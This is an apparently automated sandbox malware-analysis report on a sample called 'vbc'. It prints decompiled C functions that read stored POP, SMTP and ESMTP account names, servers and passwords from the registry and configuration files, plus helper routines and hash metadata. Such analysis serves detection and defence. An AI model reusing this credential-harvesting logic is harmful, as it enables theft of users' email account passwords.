                                                                                                                                                                        • Instruction Fuzzy Hash: 62C04C31210702DBEB218B12C849753B7E8AB40317F40CC68945695494D77DE454CE18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00406155 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00406155(CHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}




                                                                                                                                                                        0x00406159
                                                                                                                                                                        0x00406169

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                        • Opcode ID: 926f1fff4bfe7087d2453ca09093eb98846d62159ddff5e69568d7a31b1a8361
                                                                                                                                                                        • Instruction ID: f305466360af1034a225c08a34d2ddc6697937c487c9f6746c0aa1a011dcbbf5
                                                                                                                                                                        • Opcode Fuzzy Hash: 926f1fff4bfe7087d2453ca09093eb98846d62159ddff5e69568d7a31b1a8361
                                                                                                                                                                        • Instruction Fuzzy Hash: CCB012753100005BCB080B349C4A0CD35506F446327204B3CB033C00F0D720CE60BA00
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F1B0 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040F1B0(void* _a4, char* _a8, void** _a12) {
				long _t4;

				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
				return _t4;
			}




                                                                                                                                                                        0x0040f1c3
                                                                                                                                                                        0x0040f1c9

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: 0defe296c07798555785544969a09239eaeede922113c6288443005d002a046f
                                                                                                                                                                        • Instruction ID: 6c28280414aaf847a098fae787e0885161fd0282473b9be1e1f1fd42ed515737
                                                                                                                                                                        • Opcode Fuzzy Hash: 0defe296c07798555785544969a09239eaeede922113c6288443005d002a046f
                                                                                                                                                                        • Instruction Fuzzy Hash: 41C09B35544301FFDE118F40ED05F09BFA1AB88B05F008414B244240B1C2718414EB17
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 00402D74 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153stringregistryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                        			E00402D74(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
				signed int _v8;
				char _v20;
				char _v24;
				char _v152;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				char _v952;
				char _v956;
				char _v1084;
				char _v1212;
				char _v1340;
				intOrPtr _v1344;
				char _v1600;
				char _v1728;
				intOrPtr _v1732;
				char _v1860;
				char _v1872;
				void* _t59;
				signed int _t60;
				intOrPtr _t63;
				void* _t113;
				void* _t118;
				void* _t122;
				char* _t123;
				void* _t141;

				_t141 = __fp0;
				_t118 = __edi;
				_t113 = __ecx;
				_t59 = E0040F1B0(_a4, _a8,  &_a8);
				if(_t59 == 0) {
					_t60 = 0x7d;
					_a4 = _t60;
					_v8 = _t60;
					E00402197( &_v1872);
					E00402197( &_v940);
					_t63 = 2;
					_v1732 = _t63;
					_v800 = _t63;
					_push( &_v928);
					_push("DisplayName");
					_push(_a8);
					_v1344 = 4;
					_t122 = 0x7f;
					_v412 = 1;
					E0040F1F1(_t122, _t113);
					E0040F1F1(_t122, _t113, _a8, "EmailAddress",  &_v796);
					E0040F1F1(_t122, _t113, _a8, "PopAccount",  &_v408);
					E0040F1F1(_t122, _t113, _a8, "PopServer",  &_v668);
					E0040F1CA(_t113, _a8, "PopPort",  &_v24);
					E0040F1CA(_t113, _a8, "PopLogSecure",  &_v20);
					if(E0040F214(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
						_a4 = _a4 & 0x00000000;
					}
					strcpy( &_v1860,  &_v928);
					strcpy( &_v1728,  &_v796);
					E0040F1F1(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
					E0040F1F1(_t122, _t113, _a8, "SMTPServer",  &_v1600);
					E0040F1CA(_t113, _a8, "SMTPPort",  &_v956);
					E0040F1CA(_t113, _a8, "SMTPLogSecure",  &_v952);
					if(E0040F214(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
						_v8 = _v8 & 0x00000000;
					}
					_t123 = _t118 + 0xa9c;
					strcpy( &_v152, _t123);
					strcpy( &_v1084, _t123);
					_t116 = _a4;
					if(_a4 > 0) {
						E00401CD7( &_v280, _t116);
					}
					if(_v408 != 0) {
						E004023C6( &_v940, _t141, _t118);
					}
					_t117 = _v8;
					if(_v8 > 0) {
						E00401CD7( &_v1212, _t117);
					}
					if(_v1340 != 0) {
						E004023C6( &_v1872, _t141, _t118);
					}
					return RegCloseKey(_a8);
				}
				return _t59;
			}


































                                                                                                                                                                        0x00402d74
                                                                                                                                                                        0x00402d74
                                                                                                                                                                        0x00402d74
                                                                                                                                                                        0x00402d87
                                                                                                                                                                        0x00402d91
                                                                                                                                                                        0x00402d9a
                                                                                                                                                                        0x00402da1
                                                                                                                                                                        0x00402da4
                                                                                                                                                                        0x00402da7
                                                                                                                                                                        0x00402db2
                                                                                                                                                                        0x00402db9
                                                                                                                                                                        0x00402dba
                                                                                                                                                                        0x00402dc0
                                                                                                                                                                        0x00402dcc
                                                                                                                                                                        0x00402dcd
                                                                                                                                                                        0x00402dd2
                                                                                                                                                                        0x00402dd5
                                                                                                                                                                        0x00402de1
                                                                                                                                                                        0x00402de4
                                                                                                                                                                        0x00402dee
                                                                                                                                                                        0x00402e04
                                                                                                                                                                        0x00402e1a
                                                                                                                                                                        0x00402e30
                                                                                                                                                                        0x00402e41
                                                                                                                                                                        0x00402e52
                                                                                                                                                                        0x00402e77
                                                                                                                                                                        0x00402e79
                                                                                                                                                                        0x00402e79
                                                                                                                                                                        0x00402e8b
                                                                                                                                                                        0x00402e9e
                                                                                                                                                                        0x00402eb4
                                                                                                                                                                        0x00402eca
                                                                                                                                                                        0x00402ede
                                                                                                                                                                        0x00402ef2
                                                                                                                                                                        0x00402f17
                                                                                                                                                                        0x00402f19
                                                                                                                                                                        0x00402f19
                                                                                                                                                                        0x00402f1d
                                                                                                                                                                        0x00402f2b
                                                                                                                                                                        0x00402f38
                                                                                                                                                                        0x00402f3d
                                                                                                                                                                        0x00402f46
                                                                                                                                                                        0x00402f4e
                                                                                                                                                                        0x00402f4e
                                                                                                                                                                        0x00402f5a
                                                                                                                                                                        0x00402f63
                                                                                                                                                                        0x00402f63
                                                                                                                                                                        0x00402f68
                                                                                                                                                                        0x00402f6d
                                                                                                                                                                        0x00402f75
                                                                                                                                                                        0x00402f75
                                                                                                                                                                        0x00402f81
                                                                                                                                                                        0x00402f8a
                                                                                                                                                                        0x00402f8a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402f92
                                                                                                                                                                        0x00402f99

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                          • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                                                                                                                                                                          • Part of subcall function 0040F1CA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402904,?,?,?,?,00402904,?,?), ref: 0040F1E9
                                                                                                                                                                          • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 00402E8B
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?), ref: 00402E9E
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 00402F2B
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?), ref: 00402F38
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402F92
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy$QueryValue$CloseOpen
                                                                                                                                                                        • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                        • API String ID: 4127491968-1534328989
                                                                                                                                                                        • Opcode ID: 4a263c393ebea8c7b3aa3f5485092cacd202bcda1693c223d9a8b8372ccc35ea
                                                                                                                                                                        • Instruction ID: 3eb728c69d877055b887914c3e29035f7ad0c3b4bfdbdde50966da93315596c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 4a263c393ebea8c7b3aa3f5485092cacd202bcda1693c223d9a8b8372ccc35ea
                                                                                                                                                                        • Instruction Fuzzy Hash: 315139B1910218BEDB21EF51CD06BDE777CAF04304F1081B7BA08B6191E7789B989F58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004033B1 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004033B1(void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v664;
				intOrPtr _v796;
				char _v936;
				char _v1208;
				char _v1336;
				intOrPtr _v1340;
				char _v1596;
				intOrPtr _v1728;
				char _v1868;
				void* __esi;
				intOrPtr _t23;
				void* _t35;

				_t48 = __fp0;
				E00402197( &_v936);
				E00402197( &_v1868);
				_t23 = 4;
				_v796 = _t23;
				_v1728 = _t23;
				_v408 = _t23;
				_v1340 = 1;
				E00403371(__edi, "SMTPServer",  &_v664);
				E00403371(__edi, "ESMTPUsername",  &_v404);
				E00403371(__edi, "ESMTPPassword",  &_v276);
				E00403371(__edi, "POP3Server",  &_v1596);
				E00403371(__edi, "POP3Username",  &_v1336);
				_t35 = E00403371(__edi, "POP3Password",  &_v1208);
				if(_v276 != 0) {
					E00403392( &_v276);
					_t35 = E004023C6( &_v936, __fp0, _a4);
				}
				if(_v1208 != 0) {
					E00403392( &_v1208);
					return E004023C6( &_v1868, _t48, _a4);
				}
				return _t35;
			}


















                                                                                                                                                                        0x004033b1
                                                                                                                                                                        0x004033c1
                                                                                                                                                                        0x004033cc
                                                                                                                                                                        0x004033d3
                                                                                                                                                                        0x004033d4
                                                                                                                                                                        0x004033da
                                                                                                                                                                        0x004033e0
                                                                                                                                                                        0x004033f3
                                                                                                                                                                        0x004033fd
                                                                                                                                                                        0x0040340f
                                                                                                                                                                        0x00403421
                                                                                                                                                                        0x00403433
                                                                                                                                                                        0x00403445
                                                                                                                                                                        0x00403457
                                                                                                                                                                        0x00403463
                                                                                                                                                                        0x0040346b
                                                                                                                                                                        0x00403479
                                                                                                                                                                        0x00403479
                                                                                                                                                                        0x00403485
                                                                                                                                                                        0x0040348d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040349b
                                                                                                                                                                        0x004034a2

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                        • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                        • API String ID: 3963849919-1658304561
                                                                                                                                                                        • Opcode ID: 597409f585b18e28f020b58d473e644e7b11ec3109896bedd661c4ad4da97b59
                                                                                                                                                                        • Instruction ID: ad4fe9f44f4ec6704836124f0b121ca839780027ba1e1250375890495da90f14
                                                                                                                                                                        • Opcode Fuzzy Hash: 597409f585b18e28f020b58d473e644e7b11ec3109896bedd661c4ad4da97b59
                                                                                                                                                                        • Instruction Fuzzy Hash: F421BEB1C0022C6EDB61EF118D86FED7B7C9F45705F4000ABAA48B6092DB7C5BC59E59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040FEB1 Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 99%
                                                                                                                                                                        			E0040FEB1(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				short _v32;
				char* _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char _v76;
				void _v88;
				intOrPtr _v92;
				char* _v96;
				char* _v100;
				intOrPtr _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				intOrPtr _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				intOrPtr _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				intOrPtr _v172;
				char* _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				intOrPtr _v200;
				char* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				char* _v220;
				char* _v224;
				char* _v228;
				intOrPtr _v232;
				char* _v236;
				char* _v240;
				char* _v244;
				char* _v248;
				char* _v252;
				intOrPtr _v256;
				char* _v260;
				char* _v264;
				char* _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				intOrPtr _v284;
				char* _v288;
				char* _v292;
				char* _v296;
				intOrPtr _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				intOrPtr _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v344;
				char* _v348;
				char* _v352;
				char* _v356;
				char* _v360;
				char* _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char* _v376;
				char* _v380;
				intOrPtr _v384;
				char* _v388;
				char* _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				char* _v404;
				char* _v408;
				intOrPtr _v412;
				char* _v416;
				char* _v420;
				char* _v424;
				char* _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char* _v440;
				intOrPtr _v444;
				char* _v448;
				char* _v452;
				char* _v456;
				char* _v460;
				intOrPtr _v464;
				char* _v468;
				intOrPtr* _t200;
				char* _t202;
				char _t203;
				int _t205;
				int _t206;
				intOrPtr _t209;
				char* _t211;
				int _t213;
				void _t216;
				char _t220;
				void _t221;
				int _t226;
				signed int _t231;
				intOrPtr* _t232;
				void _t237;
				void* _t238;
				void* _t240;
				void* _t245;
				signed int _t246;
				signed int _t249;
				int _t250;
				void* _t251;
				int _t252;
				void* _t254;
				void* _t255;
				void* _t256;

				_v64 = "amp;";
				_v60 = "lt;";
				_v56 = "gt;";
				_v52 = "quot;";
				_v48 = "nbsp;";
				_v44 = "apos;";
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = "iexcl;";
				_v464 = "cent;";
				_v460 = "pound;";
				_v456 = "curren;";
				_v452 = "yen;";
				_v448 = "brvbar;";
				_v444 = "sect;";
				_v440 = "uml;";
				_v436 = "copy;";
				_v432 = "ordf;";
				_v428 = "laquo;";
				_v424 = "not;";
				_v420 = "shy;";
				_v416 = "reg;";
				_v412 = "macr;";
				_v408 = "deg;";
				_v404 = "plusmn;";
				_v400 = "sup2;";
				_v396 = "sup3;";
				_v392 = "acute;";
				_v388 = "micro;";
				_v384 = "para;";
				_v380 = "middot;";
				_v376 = "cedil;";
				_v372 = "sup1;";
				_v368 = "ordm;";
				_v364 = "raquo;";
				_v360 = "frac14;";
				_v356 = "frac12;";
				_v352 = "frac34;";
				_v348 = "iquest;";
				_v344 = "Agrave;";
				_v340 = "Aacute;";
				_v336 = "Acirc;";
				_v332 = "Atilde;";
				_v328 = "Auml;";
				_v324 = "Aring;";
				_v320 = "AElig;";
				_v316 = "Ccedil;";
				_v312 = "Egrave;";
				_v308 = "Eacute;";
				_v304 = "Ecirc;";
				_v300 = "Euml;";
				_v296 = "Igrave;";
				_v292 = "Iacute;";
				_v288 = "Icirc;";
				_v284 = "Iuml;";
				_v280 = "ETH;";
				_v276 = "Ntilde;";
				_v272 = "Ograve;";
				_v268 = "Oacute;";
				_v264 = "Ocirc;";
				_v260 = "Otilde;";
				_v256 = "Ouml;";
				_v252 = "times;";
				_v248 = "Oslash;";
				_v244 = "Ugrave;";
				_v240 = "Uacute;";
				_v236 = "Ucirc;";
				_v232 = "Uuml;";
				_v228 = "Yacute;";
				_v224 = "THORN;";
				_v220 = "szlig;";
				_v216 = "agrave;";
				_v212 = "aacute;";
				_v208 = "acirc;";
				_v204 = "atilde;";
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t231 = 0;
				_t254 = 0;
				_v200 = "auml;";
				_v196 = "aring;";
				_v192 = "aelig;";
				_v188 = "ccedil;";
				_v184 = "egrave;";
				_v180 = "eacute;";
				_v176 = "ecirc;";
				_v172 = "euml;";
				_v168 = "igrave;";
				_v164 = "iacute;";
				_v160 = "icirc;";
				_v156 = "iuml;";
				_v152 = "eth;";
				_v148 = "ntilde;";
				_v144 = "ograve;";
				_v140 = "oacute;";
				_v136 = "ocirc;";
				_v132 = "otilde;";
				_v128 = "ouml;";
				_v124 = "divide;";
				_v120 = "oslash;";
				_v116 = "ugrave;";
				_v112 = "uacute;";
				_v108 = "ucirc;";
				_v104 = "uuml;";
				_v100 = "yacute;";
				_v96 = "thorn;";
				_v92 = "yuml;";
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t231;
					 *_t202 = 0;
					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t254) {
					_t232 = _t254 + _t200;
					_t203 =  *_t232;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t231 + _a4)) = _t203;
							_t231 = _t231 + 1;
						} else {
							if(_t231 != _v28) {
								 *((char*)(_t231 + _a4)) = 0x20;
								_t231 = _t231 + 1;
								if(_a20 != 0 && _t231 == 1) {
									_t231 = 0;
								}
							}
							_v28 = _t231;
						}
						_t254 = _t254 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t254 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t249 = 0;
					_v36 = _t232 + 1;
					while(1) {
						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
						_v8 = _t205;
						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
						_t256 = _t256 + 0x10;
						if(_t206 == 0) {
							break;
						}
						_t249 = _t249 + 1;
						if(_t249 < 6) {
							continue;
						}
						_t209 = _a8;
						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
								_v40 = _t211;
								_t250 = strlen(_t211);
								_t213 = strncmp(_v36, _v40, _t250);
								_t256 = _t256 + 0x10;
								if(_t213 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
							_t231 = _t231 + 1;
							_t254 = _t254 + _t250 + 1;
							goto L43;
						}
						_t128 = _t209 + 2; // 0x2
						_t251 = _t254 + _t128;
						_t237 =  *_t251;
						if(_t237 == 0x78 || _t237 == 0x58) {
							_t159 = _t209 + 3; // 0x3
							_t245 = _t254 + _t159;
							_t238 = _t245;
							_t252 = 0;
							while(1) {
								_t216 =  *_t238;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									L27:
									if(_t252 <= 0) {
										goto L29;
									}
									memcpy( &_v88, _t245, _t252);
									 *((char*)(_t255 + _t252 - 0x54)) = 0;
									_t220 = E00406541( &_v88);
									_t256 = _t256 + 0x10;
									 *((char*)(_t231 + _a4)) = _t220;
									_t231 = _t231 + 1;
									_t254 = _t254 + _t252 + 4;
									goto L43;
								}
								_t252 = _t252 + 1;
								if(_t252 >= 4) {
									break;
								}
								_t238 = _t238 + 1;
							}
							_t252 = _t252 | 0xffffffff;
							goto L27;
						} else {
							_t240 = _t251;
							_t246 = 0;
							while(1) {
								_t221 =  *_t240;
								if(_t221 == 0) {
									break;
								}
								if(_t221 == 0x3b) {
									_v8 = _t246;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									memcpy( &_v76, _t251, _v8);
									 *((char*)(_t255 + _v8 - 0x48)) = 0;
									_t226 = atoi( &_v76);
									_t256 = _t256 + 0x10;
									_v32 = _t226;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
									 *((char*)(_t231 + _a4)) = _v12;
									_t231 = _t231 + 1;
									_t254 = _t254 + _v8 + 3;
									goto L43;
								}
								_t246 = _t246 + 1;
								if(_t246 >= 6) {
									break;
								}
								_t240 = _t240 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
					_t231 = _t231 + 1;
					_t254 = _t254 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}



















































































































































                                                                                                                                                                        0x0040febc
                                                                                                                                                                        0x0040fec3
                                                                                                                                                                        0x0040feca
                                                                                                                                                                        0x0040fed1
                                                                                                                                                                        0x0040fed8
                                                                                                                                                                        0x0040fedf
                                                                                                                                                                        0x0040fee6
                                                                                                                                                                        0x0040feea
                                                                                                                                                                        0x0040feee
                                                                                                                                                                        0x0040fef2
                                                                                                                                                                        0x0040fef6
                                                                                                                                                                        0x0040fefa
                                                                                                                                                                        0x0040fefe
                                                                                                                                                                        0x0040ff08
                                                                                                                                                                        0x0040ff12
                                                                                                                                                                        0x0040ff1c
                                                                                                                                                                        0x0040ff26
                                                                                                                                                                        0x0040ff30
                                                                                                                                                                        0x0040ff3a
                                                                                                                                                                        0x0040ff44
                                                                                                                                                                        0x0040ff4e
                                                                                                                                                                        0x0040ff58
                                                                                                                                                                        0x0040ff62
                                                                                                                                                                        0x0040ff6c
                                                                                                                                                                        0x0040ff76
                                                                                                                                                                        0x0040ff80
                                                                                                                                                                        0x0040ff8a
                                                                                                                                                                        0x0040ff94
                                                                                                                                                                        0x0040ff9e
                                                                                                                                                                        0x0040ffa8
                                                                                                                                                                        0x0040ffb2
                                                                                                                                                                        0x0040ffbc
                                                                                                                                                                        0x0040ffc6
                                                                                                                                                                        0x0040ffd0
                                                                                                                                                                        0x0040ffda
                                                                                                                                                                        0x0040ffe4
                                                                                                                                                                        0x0040ffee
                                                                                                                                                                        0x0040fff8
                                                                                                                                                                        0x00410002
                                                                                                                                                                        0x0041000c
                                                                                                                                                                        0x00410016
                                                                                                                                                                        0x00410020
                                                                                                                                                                        0x0041002a
                                                                                                                                                                        0x00410034
                                                                                                                                                                        0x0041003e
                                                                                                                                                                        0x00410048
                                                                                                                                                                        0x00410052
                                                                                                                                                                        0x0041005c
                                                                                                                                                                        0x00410066
                                                                                                                                                                        0x00410070
                                                                                                                                                                        0x0041007a
                                                                                                                                                                        0x00410084
                                                                                                                                                                        0x0041008e
                                                                                                                                                                        0x00410098
                                                                                                                                                                        0x004100a2
                                                                                                                                                                        0x004100ac
                                                                                                                                                                        0x004100b6
                                                                                                                                                                        0x004100c0
                                                                                                                                                                        0x004100ca
                                                                                                                                                                        0x004100d4
                                                                                                                                                                        0x004100de
                                                                                                                                                                        0x004100e8
                                                                                                                                                                        0x004100f2
                                                                                                                                                                        0x004100fc
                                                                                                                                                                        0x00410106
                                                                                                                                                                        0x00410110
                                                                                                                                                                        0x0041011a
                                                                                                                                                                        0x00410124
                                                                                                                                                                        0x0041012e
                                                                                                                                                                        0x00410138
                                                                                                                                                                        0x00410142
                                                                                                                                                                        0x0041014c
                                                                                                                                                                        0x00410156
                                                                                                                                                                        0x00410160
                                                                                                                                                                        0x0041016a
                                                                                                                                                                        0x00410174
                                                                                                                                                                        0x0041017e
                                                                                                                                                                        0x00410188
                                                                                                                                                                        0x00410192
                                                                                                                                                                        0x0041019c
                                                                                                                                                                        0x0041019f
                                                                                                                                                                        0x004101a3
                                                                                                                                                                        0x004101a5
                                                                                                                                                                        0x004101a9
                                                                                                                                                                        0x004101b3
                                                                                                                                                                        0x004101bd
                                                                                                                                                                        0x004101c7
                                                                                                                                                                        0x004101d1
                                                                                                                                                                        0x004101db
                                                                                                                                                                        0x004101e5
                                                                                                                                                                        0x004101ef
                                                                                                                                                                        0x004101f9
                                                                                                                                                                        0x00410203
                                                                                                                                                                        0x0041020d
                                                                                                                                                                        0x00410217
                                                                                                                                                                        0x00410221
                                                                                                                                                                        0x0041022b
                                                                                                                                                                        0x00410235
                                                                                                                                                                        0x0041023f
                                                                                                                                                                        0x00410249
                                                                                                                                                                        0x00410253
                                                                                                                                                                        0x0041025a
                                                                                                                                                                        0x00410261
                                                                                                                                                                        0x00410268
                                                                                                                                                                        0x0041026f
                                                                                                                                                                        0x00410276
                                                                                                                                                                        0x0041027d
                                                                                                                                                                        0x00410284
                                                                                                                                                                        0x0041028b
                                                                                                                                                                        0x00410292
                                                                                                                                                                        0x00410299
                                                                                                                                                                        0x004102a0
                                                                                                                                                                        0x0041048e
                                                                                                                                                                        0x00410491
                                                                                                                                                                        0x00410497
                                                                                                                                                                        0x0041049a
                                                                                                                                                                        0x004104ad
                                                                                                                                                                        0x004104a6
                                                                                                                                                                        0x004104a6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004104a6
                                                                                                                                                                        0x0041049a
                                                                                                                                                                        0x004102a7
                                                                                                                                                                        0x004102b6
                                                                                                                                                                        0x004102b9
                                                                                                                                                                        0x004102bd
                                                                                                                                                                        0x004102c0
                                                                                                                                                                        0x0041043d
                                                                                                                                                                        0x00410441
                                                                                                                                                                        0x0041047b
                                                                                                                                                                        0x0041047e
                                                                                                                                                                        0x00410447
                                                                                                                                                                        0x0041044a
                                                                                                                                                                        0x0041044f
                                                                                                                                                                        0x00410453
                                                                                                                                                                        0x00410458
                                                                                                                                                                        0x0041045f
                                                                                                                                                                        0x0041045f
                                                                                                                                                                        0x00410458
                                                                                                                                                                        0x00410461
                                                                                                                                                                        0x00410461
                                                                                                                                                                        0x0041047f
                                                                                                                                                                        0x00410480
                                                                                                                                                                        0x00410480
                                                                                                                                                                        0x00410487
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
